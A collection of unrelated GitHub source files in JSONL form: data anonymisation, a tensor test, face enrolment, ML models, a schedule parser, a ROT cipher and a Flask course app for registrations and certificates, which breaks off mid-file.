+{"seq_id":"16264959166","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 15 2020\n\n@author: Florentin Bodjona\n\nScript requested for question 3 of the Braincube test for the research internship\n\nHere we anonymise the nominal data 'nom' (name) and 'ville' (city) by mapping each value to an integer \n\"\"\"\n\nimport pandas as pd\nimport os \n\n# Store the data in the 'donnees' DataFrame\n\ndonnees = pd.read_csv(\"depenses.csv\")\n\n# Initialise the dictionaries that will hold the keys\n\nid_noms = dict()\nid_villes = dict()\n\n# Fill the dictionaries with the keys and their associated integers\n# Ids come from enumerate, so the first key gets 0; a repeated name keeps the id of its last occurrence\n\nid_noms = {cle : id for id,cle in enumerate(donnees['nom']) \n           if cle not in id_noms.keys()}\n\n# All cities receive integer values in the same way\n# (these ids also start at 0, from enumerate)\n\nid_villes = {cle : id for id,cle in enumerate(donnees['ville']) \n             if cle not in id_villes.keys()}\n\n# Replace each value in the 'nom' and 'ville' columns with its corresponding integer\n\ndonnees['nom'] = donnees['nom'].apply(lambda x : id_noms[x])\ndonnees['ville'] = donnees['ville'].apply(lambda x : id_villes[x])\n\n\n# Centre and scale (standardise) the ordinal data: age, salary and expenses\n\nfor i in range(2,5):\n    # Compute the mean\n    \n    moyenne = donnees.iloc[:,i].mean()\n    \n    # Compute the standard deviation\n    \n    ecart_type = donnees.iloc[:,i].std()\n    \n    # Replace each value with its standardised (z-score) value in the table\n    \n    donnees.iloc[:,i] = donnees.iloc[:,i].apply(lambda x: (x - moyenne)/ecart_type)\n    \n# Save the result to a CSV file\n\ndonnees.to_csv('depenses_anonymes.csv', index = False)","repo_name":"FloBodj/Braincube_test","sub_path":"anonymisation.py","file_name":"anonymisation.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35190483755","text":"import numpy as np\n\nfrom unittest import TestCase\n\nfrom tucker_riemopt import backend as back, set_backend\nfrom tucker_riemopt import Tucker\nfrom tucker_riemopt.riemopt import compute_gradient_projection\n\n\nclass RiemoptTest(TestCase):\n\n    def createTestTensor(self, n=4):\n        \"\"\"\n        A = [G; U, V, V], V = ones(n x n)\n        \"\"\"\n        common_factor = np.random.randn(n, n)\n        common_factor = back.tensor(common_factor)\n        common_factor = back.qr(common_factor)[0]\n        symmetric_factor = back.tensor(np.random.randn(n, n))\n        symmetric_factor = back.qr(symmetric_factor)[0]\n        symmetric_modes = [1, 2]\n        core = back.tensor(np.random.randn(n, n, n))\n        return Tucker(core, [common_factor, symmetric_factor, symmetric_factor])\n\n    def testGradProjection(self):\n        set_backend(\"pytorch\")\n        np.random.seed(229)\n\n        def f_full(A):\n            return (A ** 2 - A).sum()\n\n        def f(T: Tucker):\n            A = T.full()\n            return (A ** 2 - A).sum()\n\n        full_grad = back.grad(f_full, argnums=0)\n\n        T = self.createTestTensor(4)\n\n        eucl_grad = full_grad(T.full())\n        riem_grad, _ = compute_gradient_projection(f, T)\n\n        assert(np.allclose(back.to_numpy(eucl_grad), back.to_numpy(riem_grad.full()), atol=1e-5))\n\n\n","repo_name":"johanDDC/tucker_riemopt","sub_path":"test/common/riemopt_test.py","file_name":"riemopt_test.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"73533645850","text":"import cv2\nimport face_recognition\nimport sys \nimport os\nfrom dotenv import load_dotenv\nimport requests\n\nload_dotenv(\"./.env\")\n\n#conn.scp_download('mirori_faces/*', \"npy_files/\")\n\nif len(sys.argv) > 1:\n    email = sys.argv[1]\nelse:\n    email = input(\"Email Visiteur: \")\n\nback_route = os.getenv(\"back_route\")\napi_key = os.getenv(\"api_key\")\ndata = {\"api_key\": api_key}\ncomposed_route = back_route + \"api/user/email/\" + email\nresponse = requests.post(composed_route, data=data)\nif response.status_code != 200:\n    print(\"Erreur avec l'API, email inconnue ?\")\n    exit()\nres = response.json()\nif not res[\"id\"]:\n    print(\"API DON'T RETURN ID, 
response: \", res)\n exit()\nid = res[\"id\"]\n\nvideo_capture = cv2.VideoCapture(0, cv2.CAP_V4L2)\nvideo_capture.set(cv2.CAP_PROP_FRAME_WIDTH, 800)\nvideo_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 600)\n\n\nface_locations = []\n\nprint(\"****** ACQ PROGRAMM IS READY ! ******\")\nprint(\"SPACE BAR FOR TAKING A REFERENCE FACE IMAGE\")\nprint(\"ESC FOR EXIT\")\nwhile True:\n ret, frame = video_capture.read() # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n #ERROR IF NO FACE DETETED\n rgb_frame = frame[:, :, ::-1] # Find all the faces in the current frame of video\n face_locations = face_recognition.face_locations(rgb_frame) # Display the results\n for top, right, bottom, left in face_locations:\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2) # Display the resulting image\n cv2.imshow('Video', frame)\n \n key = cv2.waitKey(1)\n \n if key & key % 256 == 27:\n # ESC pressed for Quit\n video_capture.release()\n cv2.destroyAllWindows()\n break\n elif key & key % 256 == 32:\n # SPACE pressed for Screenshot\n img_name = \"identity.jpeg\"\n parent_folder = \"./identified/\"\n folder = str(id) + \"/\"\n path = os.path.join(parent_folder, folder)\n filename = path + img_name\n if not os.path.exists(filename):\n os.mkdir(path, 0o755)\n cv2.imwrite(path + img_name, frame)\n video_capture.release()\n cv2.destroyAllWindows()\n\n if os.path.exists(filename):\n import prepare_embedding as pe\n\n pe.encoding_image(parent_folder)\n print(\"REFERENCE IMAGE TAKEN FOR: \", id)\n else:\n print(\"IMAGE DOESN'T EXISTS, SOMETHING WENT WRONG\")\n break\n \n","repo_name":"gravity-zero/Mirori_ACQ","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29956661047","text":"\ndef palindrome_type(n):\n s = 0\n pal = lambda s : s == s[::-1]\n if pal(str(n)):\n s += 1\n if pal(format(n, 'b')):\n s += 2\n return ['Neither!','Decimal only.','Binary only.','Decimal and binary.'][s]\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"QuxCNBLcGJReCawjz_0.py","file_name":"QuxCNBLcGJReCawjz_0.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34794010040","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\n\nclass ActionAssigner(nn.Module):\n def __init__(self,\n backbone_nn='resnet18',\n input_size=512,\n hidden_size=512,\n actionlen=6,\n actionclass_num=4):\n super(ActionAssigner, self).__init__()\n self.backbone_nn = backbone_nn\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.actionlen = actionlen\n self.backbone_nn_name = backbone_nn\n self.actionclass_num = actionclass_num\n\n self.construct_actionseq_predFC()\n self.construct_actionseq_predict_logits()\n self.construct_backbone_nn()\n self.construct_merge_fc_layer()\n self.construct_LSTM_layer()\n\n def construct_LSTM_layer(self):\n self.lstm = torch.nn.LSTM(input_size=self.input_size//2,\n hidden_size=self.hidden_size//2,\n num_layers=1,\n bias=True,\n batch_first=True,\n bidirectional=True,\n proj_size=0)\n\n def construct_actionseq_predict_logits(self):\n self.action_classify_logits = torch.nn.Linear(\n in_features=self.hidden_size,\n out_features=self.actionclass_num,\n bias=True)\n\n def construct_actionseq_predFC(self):\n self.actionseq_pred_FC0 = self.linear_layer = 
nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC1 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC2 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC3 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC4 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n self.actionseq_pred_FC5 = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size,\n out_features=self.input_size//2,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size//2))\n\n\n def construct_backbone_nn(self):\n assert self.backbone_nn_name in ['resnet18', 'resnet50']\n if self.backbone_nn_name == 'resnet18':\n self.embed_backbone = self.obtain_resnet18_pretrained_model()\n elif self.backbone_nn_name == 'resnet50':\n self.embed_backbone = self.obtain_resnet50_pretrained_model()\n else:\n raise ValueError('unknown backbone neural network!')\n\n def obtain_resnet18_pretrained_model(self):\n resnet18_model = models.resnet18(pretrained=True)\n resnet18_model = nn.Sequential(*list(resnet18_model.children())[:-1])\n\n return resnet18_model\n\n def obtain_resnet50_pretrained_model(self):\n resnet50_model = models.resnet50(pretrained=True)\n resnet50_model = nn.Sequential(*list(resnet50_model.children())[:-1])\n\n return resnet50_model\n\n def construct_merge_fc_layer(self):\n self.fc_merger = self.linear_layer = nn.Sequential(\n torch.nn.Linear(in_features=self.input_size * 2,\n out_features=self.input_size,\n bias=True),\n torch.nn.ReLU(),\n torch.nn.BatchNorm1d(num_features=self.input_size))\n\n\n def forward(self, start_img_input, target_img_input, ):\n '''\n Local motion planner, in each forward process, takes one current observation\n image and one target observation image, as well as the action-sequence leading\n the agent from the current observation to the target observation. Please note\n that the maximum action list length is pre-set as `steplen`, otherwise it is\n padded to `steplen` by concatenating `stop` action. 
The actions are:\n 0: MoveForward, 1: Turn-Left, 2: Turn-Right, 3: Stop\n :param video_obs_input: [batch, seqlen, channel, height, width]\n :param target_obs: [batch, channel, height, width]\n :param action_input: [batch, steplen], of integers in [0,1,2,3]\n :return: logits\n '''\n start_img_embed = self.embed_backbone( start_img_input )\n target_img_embed = self.embed_backbone( target_img_input )\n\n start_img_embed = torch.squeeze( start_img_embed )\n target_img_embed = torch.squeeze( target_img_embed )\n\n concat_embed_feat = torch.cat(tensors=(start_img_embed,\n target_img_embed),\n dim=-1)\n\n concat_embed_feat = concat_embed_feat.contiguous()\n merged_feat = self.fc_merger(concat_embed_feat)\n\n actseq_fc0 = self.actionseq_pred_FC0(merged_feat)\n actseq_fc1 = self.actionseq_pred_FC1(merged_feat)\n actseq_fc2 = self.actionseq_pred_FC2(merged_feat)\n actseq_fc3 = self.actionseq_pred_FC3(merged_feat)\n actseq_fc4 = self.actionseq_pred_FC4(merged_feat)\n actseq_fc5 = self.actionseq_pred_FC5(merged_feat)\n\n actseq_feat = torch.stack(tensors=(actseq_fc0,\n actseq_fc1,\n actseq_fc2,\n actseq_fc3,\n actseq_fc4,\n actseq_fc5),\n dim=1)\n\n actseq_feat = self.lstm(actseq_feat)[0] #[batchsize, seqlen, 512]\n\n actionseq_pred_logits = self.action_classify_logits(actseq_feat)\n\n\n return actionseq_pred_logits\n\n\nclass ActionAssignerLoss(object):\n def __init__(self):\n self.ce_loss = nn.CrossEntropyLoss()\n def compute_loss(self, action_pred_logits, action_gt ):\n actionclass_num = action_pred_logits.shape[-1]\n # import pdb\n # pdb.set_trace()\n action_pred_logits = torch.reshape(action_pred_logits, shape=[-1, actionclass_num])\n # action_gt = torch.reshape(action_gt, shape=[-1, actionclass_num])\n action_gt = torch.reshape(action_gt, shape=[-1])\n\n loss = self.ce_loss(action_pred_logits, action_gt)\n\n return loss\n","repo_name":"ai4ce/DeepExplorer","sub_path":"models/action_assigner.py","file_name":"action_assigner.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"6865814207","text":"\"\"\"Create schedule from the given file.\"\"\"\nimport re\n\n\ndef read_file(input_file):\n \"\"\"\n Reading from file.\n\n :param input_file:\n \"\"\"\n with open(input_file, \"r\") as file:\n data = file.read()\n return data\n\n\ndef get_schedule_dict(input_string):\n \"\"\"\n Creating dict.\n\n :param input_string:\n \"\"\"\n schedule_dict = {}\n regex = r\" ([0-9]+)\\D([0-9]+)\\ +([a-zA-Z]+)\"\n for match in re.finditer(regex, input_string):\n h = match.group(1)\n m = match.group(2)\n w = match.group(3).lower()\n if len(h) <= 2 and len(m) <= 2:\n if 0 <= int(h) < 24 and 0 <= int(m) <= 59:\n t = f\"{int(h):02}:{int(m):02}\"\n if t in schedule_dict:\n value_list = []\n for i in schedule_dict[t]:\n value_list.append(i)\n if w not in value_list:\n value_list.append(w)\n schedule_dict[t] = value_list\n else:\n schedule_dict[t] = [w]\n return schedule_dict\n\n\ndef get_am_pm(input_string):\n \"\"\"\n Get am/pm list.\n\n :param input_string:\n \"\"\"\n schedule_dict = get_schedule_dict(input_string)\n sorted_dict = {}\n for i in sorted(schedule_dict):\n sorted_dict[i] = schedule_dict[i]\n ampm_dict = {}\n for i in sorted_dict:\n hour = i.split(\":\", )[0]\n hour = int(hour)\n time_list = i.split(\":\")\n words = schedule_dict[i]\n if 0 <= hour < 12:\n if hour == 0:\n time_list[0] = \"12\"\n else:\n time_list[0] = \"%02d\" % hour\n t = time_list[0] + \":\" + time_list[1] + \" AM\"\n 
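# lstrip('0') trims the single leading zero of the zero-padded hour, e.g. '09:05 AM' -> '9:05 AM' (hour 0 was already mapped to '12' above)\n            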
ampm_dict[t.lstrip(\"0\")] = words\n else:\n if hour == 12:\n time_list[0] = \"12\"\n else:\n time_list[0] = \"%02d\" % (hour - 12)\n t = time_list[0] + \":\" + time_list[1] + \" PM\"\n ampm_dict[t.lstrip(\"0\")] = words\n return ampm_dict\n\n\ndef get_table_space(key_value, number):\n \"\"\"\n Calculate max len number from a list of dict key and value lengths.\n\n :param key_value:\n :param number:\n \"\"\"\n length = [number]\n for i in key_value:\n if type(i) == str:\n length.append(len(i))\n else:\n if len(i) > 1:\n length.append(len(', '.join(i)))\n else:\n length.append(len(i[0]))\n return max(length) + 2\n\n\ndef create_schedule_string(input_string: str) -> str:\n \"\"\"Create schedule string from the given input string.\"\"\"\n ampm_dict = get_am_pm(input_string)\n if len(ampm_dict) == 0:\n return \"------------------\\n| time | items |\\n------------------\\n| No items found |\\n------------------\"\n w1 = get_table_space(ampm_dict.keys(), 4)\n w2 = get_table_space(ampm_dict.values(), 5)\n line = \"-\" * (w1 + w2 + 3)\n header = f\"|\" + ((w1 - 5) * \" \") + \"time | items\" + ((w2 - 6) * \" \") + \"|\"\n row = \"\"\n for i in ampm_dict:\n n = \"\\n\"\n value = \", \".join(ampm_dict[i])\n value_len = len(value)\n row += \"|\" + (w1 - (len(i) + 1)) * \" \" + i + \" | \" + value + (w2 - value_len - 1) * \" \" + \"|\" + n\n row = row.rstrip(\"\\n\")\n table_list = [line, header, line, row, line]\n table_string = \"\\n\".join(table_list)\n return table_string\n\n\ndef create_schedule_file(input_filename: str, output_filename: str) -> None:\n \"\"\"Create schedule file from the given input file.\"\"\"\n with open(input_filename, \"r\") as f:\n read = f.read()\n result = create_schedule_string(read)\n output_file = open(output_filename, \"w\")\n output_file.write(result)\n\n\nif __name__ == '__main__':\n create_schedule_file(\"schedule_input.txt\", \"schedule_output.txt\")\n","repo_name":"saartanel/iti0102-2019","sub_path":"ex06_schedule/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4498570984","text":"def load_runs(fp: str):\n runs = []\n with open(fp, 'r') as file:\n for line in file.readlines():\n runs.append(float(line))\n\n return runs\n\ndef load_convergence(fp: str, max_itens: int = 100006):\n\n iters = []\n temps = []\n dists = []\n with open(fp, \"r\") as txt_file:\n iter = 1\n for line in txt_file.readlines():\n raw = line.split(\" \")\n temp = raw[0]\n dist = raw[1]\n\n iters.append(int(iter))\n temps.append(float(temp))\n dists.append(float(dist))\n\n iter += 1\n \n return iters[:max_itens], temps[:max_itens], dists[:max_itens]","repo_name":"bkpedrosuper/simulated-annealing","sub_path":"data_plot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"74374890010","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n l1numb = self.convertNumb(self.lstNodeToArr(l1, []))\n \n l2numb = self.convertNumb(self.lstNodeToArr(l2, []))\n \n return self.arrToListNode([int(i) for i in str(l1numb + l2numb)])\n \n def lstNodeToArr(self, lstNode, finlst):\n if lstNode.next:\n finlst.append(lstNode.val)\n return 
self.lstNodeToArr(lstNode.next, finlst)\n else:\n finlst.append(lstNode.val)\n finlst.reverse()\n return finlst\n \n def convertNumb(self, lst):\n strings = [str(integer) for integer in lst]\n a_string = \"\". join(strings)\n return int(a_string)\n \n def arrToListNode(self, numbs):\n nodeList = None\n for x in numbs:\n nodeList = ListNode(x, next=nodeList)\n return nodeList","repo_name":"taylor-ortiz/codingChallenges","sub_path":"AddTwoNumbers/addTwoNumbers.py","file_name":"addTwoNumbers.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"14788754419","text":"import argparse\ndef encrypt(text, rot_val):\n enc_wrd = ''\n text = str(text)\n for i in range(len(text)):\n char = text[i]\n if (char.isupper()):\n enc_wrd = enc_wrd + str(chr((ord(char) + int(rot_val)-65) % 26 + 65))\n elif char == \" \":\n enc_wrd = enc_wrd + \" \"\n elif (char.islower()):\n enc_wrd = enc_wrd + str(chr((ord(char) + int(rot_val)-97) % 26 + 97))\n else:\n enc_wrd = enc_wrd + char\n return enc_wrd\n\ndef decrypt(text, rot_val):\n dec_wrd = ''\n for i in range(len(text)):\n char = text[i]\n if (char.isupper()):\n dec_wrd = dec_wrd + chr((int(ord(char)) - int(rot_val)-65) % 26 + 65)\n elif char == \" \":\n dec_wrd = dec_wrd + \" \"\n elif (char.islower()):\n dec_wrd = dec_wrd + chr((int(ord(char)) - int(rot_val)-97) % 26 + 97)\n else:\n dec_wrd = dec_wrd + char\n return dec_wrd\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--encrypt', help=\"True/False\")\n parser.add_argument(\"-d\", \"--decrypt\", help=\"True/False\")\n args = parser.parse_args()\n \n if args.encrypt:\n plaintext = input(\"Plain text to encrypt: \")\n rot_val = input(\"ROT Value: \")\n encrypted_wrd = encrypt(plaintext, rot_val)\n print(\"Encrypted message: \" + encrypted_wrd)\n if args.decrypt:\n rot_val = input(\"ROT Value: \")\n encrypted_wrd = input(\"Encrypted text to decrypt: \")\n if \"all\" in rot_val:\n from detectEnglish import *\n potential_keys = []\n for i in range(1, 25):\n decrypted_wrd = decrypt(encrypted_wrd, i)\n if isEnglish(decrypted_wrd):\n potential_keys.append(i)\n print(\"\\nPotential keys:-\\n\")\n for i in potential_keys:\n print(f\"KEY{i}\")\n print(\"\\nShowing results for all potential keys...\\n\")\n for i in potential_keys:\n decrypted_word = decrypt(encrypted_wrd, i)\n print(f\"KEY{i} Decrypted text: {decrypted_word}\")\n else:\n decrypted_wrd = decrypt(encrypted_wrd, rot_val)\n print(\"Decrypted message: \" + decrypted_wrd) \n","repo_name":"googleboy-byte/cryptography","sub_path":"cryptography/rot_cipher.py","file_name":"rot_cipher.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35772594378","text":"import io\nimport os\nimport csv\nimport yaml\nimport math\nimport locale\nimport hashlib\nimport requests\nimport cryptography\nfrom flask import Flask, render_template, request, redirect, url_for, session, make_response, Response, g\nfrom fpdf import FPDF\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom requests_oauthlib import OAuth1Session\nfrom oauth_wiki import get_username\nfrom sqlalchemy_utils import StringEncryptedType\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\nfrom email.message import EmailMessage\nimport ssl\nimport smtplib\nfrom email.header import Header\nfrom email.utils import formataddr\nfrom email.mime.text 
import MIMEText\n\n__dir__ = os.path.dirname(__file__)\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'\napp.config['SQLALCHEMY_BINDS'] = {'activities': 'sqlite:///users.db'}\napp.config.update(yaml.safe_load(open(os.path.join(__dir__, 'config.yaml'))))\n\n# Initialize the database\ndb = SQLAlchemy(app)\n\nkey = app.config[\"ENCRYPTION_KEY\"]\n\n\n# Create database (db) model\nclass Users(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(150), nullable=False, unique=True)\n full_name = db.Column(StringEncryptedType(db.String(300), key), nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow())\n date_modified = db.Column(db.DateTime, default=datetime.utcnow())\n can_download_certificate = db.Column(db.String(), nullable=False)\n solicited_certificate = db.Column(db.Boolean, nullable=False, default=False)\n\n\nclass SubsPDF(FPDF):\n def header(self):\n self.image(os.path.join(app.static_folder, 'A_los_derechos_humanos_cropped.jpg'), x=0, y=0, w=210, h=32)\n # Box for the title\n self.set_draw_color(0, 104, 163)\n self.set_fill_color(0, 104, 163) # Blue box as background for the title\n self.set_text_color(255, 255, 255) # Title in white color\n self.set_font('Times', 'B', 15) # Title in Times New Roman, bold, 15pt\n # Title text\n self.set_x(30)\n self.cell(w=150, h=12, border=0, ln=1, align='C', fill=True, txt='INTRODUÇÃO AO JORNALISMO CIENTÍFICO')\n\n def footer(self):\n username = get_username()\n user = Users.query.filter_by(username=username).first()\n date_modified = user.date_modified\n user_hash = hashlib.sha1(bytes(\"Subscription \" + username + str(date_modified), 'utf-8')).hexdigest()\n self.set_y(-16.5)\n self.set_font('Times', '', 8.8)\n self.cell(w=0, h=6.5, border=0, ln=1, align='C',\n txt='A validade deste documento pode ser checada em https://ijc.toolforge.org/. '\n 'O código de validação é: ' + user_hash)\n pass\n\n\nclass CertificationPDF(FPDF):\n def header(self):\n self.image(os.path.join(app.static_folder, 'background_certificado.jpg'), x=0, y=0, w=297, h=210)\n\n def footer(self):\n username = get_username()\n user = Users.query.filter_by(username=username).first()\n date_modified = user.date_modified\n user_hash = hashlib.sha1(bytes(\"Certificate \" + username + str(date_modified), 'utf-8')).hexdigest()\n self.set_y(-16.5)\n self.set_font('Merriweather', '', 8.8)\n self.cell(w=0, h=6.5, border=0, ln=1, align='C',\n txt='A validade deste documento pode ser checada em https://ijc.toolforge.org/. 
'\n 'O código de validação é: ' + user_hash)\n pass\n\n\n########################################################################################################################\n# L O G I N\n########################################################################################################################\n@app.before_request\ndef init_profile():\n g.profiling = []\n\n\n@app.before_request\ndef global_user():\n g.user = get_username()\n\n\n@app.route('/login')\ndef login():\n \"\"\"\n This function creates an OAuth session and sends the user\n to the authorization special webpage in ptwikiversity so\n the user can give permission for the tool to operate.\n\n :return: redirects the user to the authorization special\n webpage on ptwikiversity.\n \"\"\"\n\n next_page = request.args.get('next')\n\n if next_page:\n session['after_login'] = next_page\n\n client_key = app.config['CONSUMER_KEY']\n client_secret = app.config['CONSUMER_SECRET']\n\n base_url = 'https://pt.wikiversity.org/w/index.php'\n request_token_url = base_url + '?title=Special%3aOAuth%2finitiate'\n\n oauth = OAuth1Session(client_key,\n client_secret=client_secret,\n callback_uri='oob')\n\n fetch_response = oauth.fetch_request_token(request_token_url)\n\n session['owner_key'] = fetch_response.get('oauth_token')\n session['owner_secret'] = fetch_response.get('oauth_token_secret')\n\n base_authorization_url = 'https://pt.wikiversity.org/wiki/Special:OAuth/authorize'\n authorization_url = oauth.authorization_url(base_authorization_url,\n oauth_consumer_key=client_key)\n\n return redirect(authorization_url)\n\n\n@app.route(\"/oauth-callback\", methods=[\"GET\"])\ndef oauth_callback():\n \"\"\"\n This function stores the authorization tokens of the\n users and redirects them to the page they were before\n the logging in process.\n\n :return: redirects the users to the page they were\n before logging in and authorizating the tool.\n \"\"\"\n\n base_url = 'https://pt.wikiversity.org/w/index.php'\n client_key = app.config['CONSUMER_KEY']\n client_secret = app.config['CONSUMER_SECRET']\n\n oauth = OAuth1Session(client_key,\n client_secret=client_secret,\n resource_owner_key=session['owner_key'],\n resource_owner_secret=session['owner_secret'])\n\n oauth_response = oauth.parse_authorization_response(request.url)\n verifier = oauth_response.get('oauth_verifier')\n access_token_url = base_url + '?title=Special%3aOAuth%2ftoken'\n\n oauth = OAuth1Session(client_key,\n client_secret=client_secret,\n resource_owner_key=session['owner_key'],\n resource_owner_secret=session['owner_secret'],\n verifier=verifier)\n\n oauth_tokens = oauth.fetch_access_token(access_token_url)\n session['owner_key'] = oauth_tokens.get('oauth_token')\n session['owner_secret'] = oauth_tokens.get('oauth_token_secret')\n next_page = session.get('after_login')\n\n return redirect(next_page)\n\n\n########################################################################################################################\n# P A G E S\n########################################################################################################################\n# Sobre\n@app.route('/about')\ndef about():\n \"\"\"\n This function shows a page describing the Introdução ao Jornalismo Científico course and tool\n\n :return: A html page with the about content.\n \"\"\"\n\n username = get_username()\n return render_template('about.html',\n username=username)\n\n\n# Página inicial\n@app.route('/')\ndef home():\n \"\"\"\n This function shows the homepage for the Introdução ao Jornalismo 
Científico tool\n\n :return: A html page with the initial content.\n \"\"\"\n\n username = get_username()\n return render_template('home.html',\n username=username)\n\n\n# Inscrição\n@app.route('/subscription', methods=['POST', 'GET'])\ndef subscription():\n \"\"\"\n This page shows a webpage with the letter of subscription\n\n :return: A html page with a form for subscription\n \"\"\"\n\n username = get_username()\n\n if username:\n if request.method == 'POST':\n user_name = request.form['Username']\n full_name = request.form['FullName']\n modules_activities = [\"NP\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]\n\n new_subscription = Users(username=user_name,\n full_name=full_name,\n can_download_certificate=\";\".join(modules_activities))\n\n # Try to push it to the database\n try:\n db.session.add(new_subscription)\n db.session.commit()\n return redirect(url_for('subscription'))\n except:\n return 'Ocorreu um erro!'\n else:\n user_is_registered = Users.query.filter_by(username=username).first()\n return render_template('subscription.html',\n username=username,\n user_is_registered=user_is_registered)\n else:\n return redirect(url_for('home'))\n\n\n# Atualizar inscrição\n@app.route('/update_subscription/', methods=['POST', 'GET'])\ndef update_subscription(user_username):\n \"\"\"\n This function shows a page for the coordinator update users full name\n\n :return: A html page with a form for updating the user subscription\n \"\"\"\n\n username = get_username()\n if username in app.config['COORDINATORS_USERNAMES']:\n user_to_update = Users.query.filter_by(username=user_username).first()\n\n if request.method == 'POST':\n user_to_update.full_name = request.form[\"FullName\"]\n user_to_update.date_modified = datetime.utcnow()\n\n modules_activities = [\"F\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]\n user_to_update.can_download_certificate = \";\".join(modules_activities)\n\n # Try to push it to the database\n try:\n db.session.commit()\n return redirect(url_for('subscription'))\n except:\n return 'Ocorreu um erro!'\n else:\n return render_template('update_subscription.html',\n username=username,\n user=user_to_update)\n else:\n return redirect(url_for('home'))\n\n\n# Gerar carta de inscrição\n@app.route('/subscription_letter', methods=['GET'])\ndef subscription_letter():\n \"\"\"\n This function generates a pdf file with a letter of subscription in the course\n\n :return: A pdf file with a letter of subscription\n \"\"\"\n\n username = get_username()\n\n if username:\n # Create page\n pdf = SubsPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n\n #######################################################################################################\n # Data\n #######################################################################################################\n pdf.set_xy(10, 42) # Start the letter text at the 10x42mm point\n\n pdf.set_font('Times', '', 13) # Text of the body in Times New Roman, regular, 13 pt\n\n locale.setlocale(locale.LC_TIME, \"pt_BR\") # Setting the language to portuguese for the date\n pdf.cell(w=150, h=6.5, border=0, ln=1, align='L',\n txt='São Paulo, ' + datetime.now().strftime(\"%d de %B de %Y\"))\n\n pdf.cell(w=0, h=6.5, ln=1) # New line\n\n #######################################################################################################\n # A quem possa interessar\n #######################################################################################################\n pdf.set_font('Times', 'B', 13) # Text of the addressing 
in Times New Roman, bold, 13 pt\n pdf.cell(w=150, h=6.5, txt='A quem possa interessar', border=0, ln=1, align='L')\n\n pdf.cell(w=0, h=6.5, ln=1) # New line\n\n #######################################################################################################\n # User data\n #######################################################################################################\n user = Users.query.filter_by(username=username).first()\n\n name = user.full_name # User full name\n\n #######################################################################################################\n # Text\n #######################################################################################################\n pdf.set_font('Times', '', 13) # Text of the body in Times New Roman, regular, 13 pt\n pdf.multi_cell(w=0,\n h=6.5,\n txt=\"O curso de Introdução ao Jornalismo Científico, desenvolvido pelo Centro de Pesquisa, Inovação \"\n \"e Difusão em Neuromatemática com o apoio da FAPESP e do Wiki Movimento Brasil, está disponível \"\n \"em uma plataforma de educação aberta, a Wikiversidade.\\n\\n\"\n \"As aulas foram realizadas, com orientação científica da equipe de pesquisa do CEPID NeuroMat, \"\n \"por bolsistas de jornalismo científico da FAPESP. O objetivo do curso é capacitar profissio\"\n \"nais de comunicação na cobertura 